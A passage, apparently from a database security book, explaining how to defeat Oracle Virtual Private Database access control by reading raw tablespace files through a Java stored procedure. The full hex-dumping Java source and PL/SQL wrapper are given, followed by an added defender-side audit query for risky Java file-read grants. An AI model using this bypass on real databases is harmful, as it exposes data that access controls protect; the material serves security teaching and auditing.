8.2. Defeating VPDs with Raw File Access

You can entirely bypass database-enforced access control by accessing the raw data file itself. This is fully covered in Chapter 11, but here's the code now:

SET ESCAPE ON
SET ESCAPE "\"
SET SERVEROUTPUT ON

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADBINFILE" AS
import java.lang.*;
import java.io.*;

public class JAVAREADBINFILE
{
        public static void readbinfile(String f, int start) throws
IOException
      {
            FileInputStream fis;
           DataInputStream dis;
           try
           {
                 int i;
                 int ih,il;
                 int cnt = 1, h=0,l=0;
                 String hex[] = {"0", "1", "2","3", "4", "5", "6", "7",
"8","9", "A", "B", "C", "D", "E","F"};
                 RandomAccessFile raf = new RandomAccessFile (f, "r");
                 raf.seek (start);
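                 // Dump the bytes that follow offset "start" as hex escapes, 16 per line
                 for(i=0; i<=512; i++)
                 {
                      // The backslash before the ampersand is the SQL*Plus escape
                      // character set above; it stops variable substitution.
                      ih = il = raf.readByte() \& 0xFF;
                      h = ih >> 4;      // high nibble
                      l = il \& 0x0F;   // low nibble

                      System.out.print("\\\\x" + hex[h] + hex[l]);
                      if(cnt \% 16 == 0)
                             System.out.println();
                      cnt ++;
                 }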
           }
           catch (EOFException eof)
           {
                             System.out.println();
                             System.out.println( "EOF reached " );
           }
           catch (IOException ioe)
                 {
                             System.out.println( "IO error: " + ioe );
                 }
        }
}
/
show errors
/
CREATE OR REPLACE PROCEDURE JAVAREADBINFILEPROC (p_filename IN
VARCHAR2, p_start in number)
AS LANGUAGE JAVA
NAME 'JAVAREADBINFILE.readbinfile (java.lang.String, int)';
/
show errors
/

Once this has been created you can use it to read the files directly — in this case, the VPDTESTTABLE exists in the USERS tablespace:

SQL> set serveroutput on
SQL> exec dbms_java.set_output(2000);

PL/SQL procedure successfully completed.

SQL> ...
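
A defender-side check for the technique above, as an added example that is not from the book: Java code running inside the database needs a java.io.FilePermission that covers a file before it can open it, so this query lists the enabled read grants in DBA_JAVA_POLICY that reach any file in DBA_DATA_FILES. It assumes a DBA-privileged session; the column alias is illustrative.

```sql
-- Added audit query (not from the book). Run as a DBA-privileged user.
-- Lists enabled Java read grants whose path covers a database data file.
SELECT p.grantee,
       p.name            AS permitted_path,
       p.action,
       d.tablespace_name,
       d.file_name
FROM   dba_java_policy p
JOIN   dba_data_files  d
  ON   p.name = '<<ALL FILES>>'                 -- blanket file access
  OR   p.name = d.file_name                     -- exact data file path
  OR  (SUBSTR(p.name, -1) IN ('*', '-')         -- directory grant: dir/* or dir/-
       AND SUBSTR(d.file_name, 1, LENGTH(p.name) - 1)
           = SUBSTR(p.name, 1, LENGTH(p.name) - 1))
WHERE  p.kind      = 'GRANT'
AND    p.type_name = 'java.io.FilePermission'
AND    p.enabled   = 'ENABLED'
AND    INSTR(LOWER(p.action), 'read') > 0
ORDER  BY p.grantee, d.tablespace_name;
```

Directory grants are matched by prefix, so a `dir/*` grant is also reported for files in subdirectories; treat the output as a list to review. A grantee may be a role, in which case DBA_ROLE_PRIVS shows which accounts inherit the permission.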
